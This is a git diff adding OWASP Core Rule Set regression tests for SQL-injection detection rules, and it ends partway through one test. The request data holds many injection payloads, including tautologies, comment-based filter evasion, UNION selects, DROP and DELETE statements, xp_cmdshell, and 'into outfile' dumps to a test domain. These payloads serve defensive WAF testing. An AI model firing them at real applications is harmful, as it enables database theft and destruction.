diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml new file mode 100644 index 00000000..db33417a --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml @@ -0,0 +1,23 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942430.yaml +tests: + - test_title: 942430-1 + desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=(((((())))))&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942430" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml new file mode 100644 index 00000000..02e2cd0c --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml @@ -0,0 +1,23 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942431.yaml +tests: + - test_title: 942431-1 + desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=-------------------&var2=whatever" + version: HTTP/1.0 + output: + log_contains: id "942431" 
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml new file mode 100644 index 00000000..7ae6545a --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml @@ -0,0 +1,23 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942432.yaml +tests: + - test_title: 942432-1 + desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=;;dd foo bar" + version: HTTP/1.0 + output: + log_contains: id "942432" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml new file mode 100644 index 00000000..154610ea --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml 
@@ -0,0 +1,309 @@ +--- +meta: + author: "Christian S.J. Peron" + description: None + enabled: true + name: 942440.yaml +tests: + - test_title: 942440-1 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/post?var=DROP%20sampletable%3b--" + version: HTTP/1.0 + output: + log_contains: id "942440" + - test_title: 942440-2 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' or 1=1;%00" + output: + log_contains: id "942440" + - test_title: 942440-3 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=OR 1# " + output: + log_contains: id "942440" + - test_title: 942440-4 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=admin'--" + output: + log_contains: id "942440" + - test_title: 942440-5 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=DROP/*comment*/sampletable" + output: + log_contains: id "942440" + - test_title: 942440-6 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=DR/**/OP/*bypass deny listing*/sampletable" + output: + log_contains: id "942440" + - test_title: 942440-7 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=SELECT/*avoid-spaces*/password/**/FROM/**/Members" + output: + log_contains: id "942440" + - test_title: 942440-8 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=SELECT /*!32302 1/0, */ 1 FROM tablename" + output: + log_contains: id "942440" + - test_title: 942440-9 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' or 1=1# " + output: + log_contains: id 
"942440" + - test_title: 942440-10 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=‘ or 1=1-- -" + output: + log_contains: id "942440" + - test_title: 942440-11 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=‘ or 1=1/*" + output: + log_contains: id "942440" + - test_title: 942440-12 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=1='1' or-- -" + output: + log_contains: id "942440" + - test_title: 942440-13 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=' /*!50000or*/1='1" + output: + log_contains: id "942440" + - test_title: 942440-14 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + 
version: "HTTP/1.0" + uri: "/post" + data: "test=' /*!or*/1='1" + output: + log_contains: id "942440" + - test_title: 942440-15 + desc: "SQL Comment Sequence" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "POST" + port: 80 + version: "HTTP/1.0" + uri: "/post" + data: "test=0/**/union/*!50000select*/table_name`foo`/**/" + output: + log_contains: id "942440" + - test_title: 942440-16 + desc: "Avoid False Positive on JWT (body)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "POST" + port: 80 + version: "HTTP/1.1" + uri: "/post" + data: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + output: + no_log_contains: id "942440" + - test_title: 942440-17 + desc: "Avoid False Positive on JWT (cookie)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + method: "POST" + port: 80 + version: "HTTP/1.1" + uri: "/post" + data: "foo=bar" + output: + no_log_contains: id "942440" + - test_title: 942440-18 + desc: "Avoid False Positive on JWT (querystring)" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + method: "GET" + port: 80 + version: "HTTP/1.1" + uri: "/callback?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMe--KKF2QT4fwpMeJf36POk6yJV_adQssw-5c" + output: + no_log_contains: id "942440" 
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml new file mode 100644 index 00000000..a308e3be --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml 
@@ -0,0 +1,92 @@ +--- +meta: + author: "William Woodson" + description: None + enabled: true + name: 942450.yaml +tests: + - test_title: 942450-1 + desc: "SQL Hex Encoding" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/" + data: "var=%5c0xf00dsdfdsa" + version: HTTP/1.0 + output: + log_contains: id "942450" + - test_title: 942450-2 + desc: "SQL Hex Encoding" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/" + data: "var=concat%280x223e3c62723e%2Cversion%28%29%2C0x3c696d67207372633d22%29" + version: HTTP/1.0 + output: + log_contains: id "942450" + - test_title: 942450-3 + desc: "SQL Hex Encoding" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/" + data: "var=select%200x616263" + version: HTTP/1.0 + output: + log_contains: id "942450" + - test_title: 942450-4 + desc: "SQL Hex Encoding - negative" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/" + data: "var=IHRlc3Q0xAcF" + version: HTTP/1.0 + output: + no_log_contains: id "942450" + - test_title: 942450-5 + desc: "SQL Hex Encoding - negative" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test 
agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/" + data: "var=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08" + version: HTTP/1.0 + output: + no_log_contains: id "942450" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml new file mode 100644 index 00000000..e2776bd0 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942460.yaml @@ -0,0 +1,41 @@ +--- +meta: + author: "Franziska Bühler" + description: None + enabled: true + name: 942460.yaml +tests: + - test_title: 942460-1 + desc: "Repetitive Non-Word Characters" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/" + data: "var=foo...." + version: HTTP/1.1 + output: + log_contains: id "942460" + - test_title: 942460-2 + desc: "Repetitive Non-Word Characters negative test only 3 characters" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + port: 80 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + uri: "/" + data: "var=foo..." + version: HTTP/1.1 + output: + no_log_contains: id "942460" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml new file mode 100644 index 00000000..0b569ede --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml 
@@ -0,0 +1,193 @@ +--- +meta: + author: "Christoph Hansen" + description: None + enabled: true + name: 942470.yaml +tests: + - test_title: 942470-1 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=nvarchar" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-2 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=xp_cmdshell" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-3 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=varchar" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-4 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=xp_dirtree" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-5 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=xp_regread" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-6 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=sp_password" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-7 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=UTL_HTTP" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-8 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=OPENROWSET" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-9 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "pay=sp_executesql" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-10 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: 
"OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "sp_executesql" + version: HTTP/1.0 + output: + log_contains: id "942470" + - test_title: 942470-11 + desc: "SQL Injection Attack: current_user" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=1%2bcurrent_user::int" + version: HTTP/1.0 + output: + log_contains: id "942470" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml new file mode 100644 index 00000000..64565771 --- /dev/null +++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml 
@@ -0,0 +1,210 @@ +--- +meta: + author: "Jose Nazario" + description: None + enabled: true + name: 942480.yaml +tests: + - test_title: 942480-1 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + # variable name boundary attacks + uri: "/?'msdasql'" + version: HTTP/1.0 + output: + log_contains: "id \"942480" + - test_title: 942480-2 + desc: "SQL Injection Attack" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + headers: + Host: "localhost" + Cache-Control: "no-cache, no-store, must-revalidate" + # variable name boundary attacks + Cookie: "'msdasql'" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + version: HTTP/1.0 + output: + log_contains: "id \"942480" + - test_title: 942480-3 + desc: "Data dump using 'into outfile'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=EmptyValue into outfile '\\\\\\\\jviw6aoxefbjk0luyi6oiwjv5unittests.coreruleset.org\\\\xct'; --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-4 + desc: "Data dump using 'into outfile'" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=/config.ini' into outfile 
'\\\\\\\\il7vw9ew4e1iazbtohwn8v9uvl1hunitetests.coreruleset.org\\\\yxq'; --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-5 + desc: "SQL injection using 'UNION ALL" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=0.3480567293179807' UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-6 + desc: "SQL injection using 'UNION ALL" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=config.ini\") UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-7 + desc: "SQL injection using 'UNION ALL" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=CRS) UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-8 + desc: "SQL injection using 'UNION ALL" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "var=CRS3\") UNION ALL select NULL --" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-9 + desc: "SQL injection using 'overlay(...placing..)" + stages: + - stage: + 
input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=overlay(password%20placing%20%27%27%20from%201%20for%200)::int" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-10 + desc: "SQL injection in User-Agent" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: DELETE FROM users;-- + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-11 + desc: "SQL injection in arbitrary header" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + SomeHeader: DELETE FROM users;-- + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/" + version: HTTP/1.0 + output: + log_contains: id "942480" + - test_title: 942480-12 + desc: "SQL injection using 'overlay(...placing..) with newlines" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/index.php?id=overlay(password%0aplacing%0a%27%27%0afrom%201%20for%200)::int" + version: HTTP/1.0 + output: + log_contains: id "942480" diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml new file mode 100644 index 00000000..d02e1780 --- /dev/null 
+++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml 
@@ -0,0 +1,380 @@ +--- +meta: + author: "Christoph Hansen" + description: None + enabled: true + name: 942490.yaml +tests: + - test_title: 942490-1 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + data: "var=%22%60%20%2A%20123" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-2 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "' ', 10" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-3 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "'', '', '', '', '', '', '', '', 13" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-4 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/" + data: "`>65" + version: HTTP/1.0 + output: + log_contains: id "942490" + - test_title: 942490-5 + desc: "classic SQL injection probings 3/3" + stages: + - stage: + input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: 
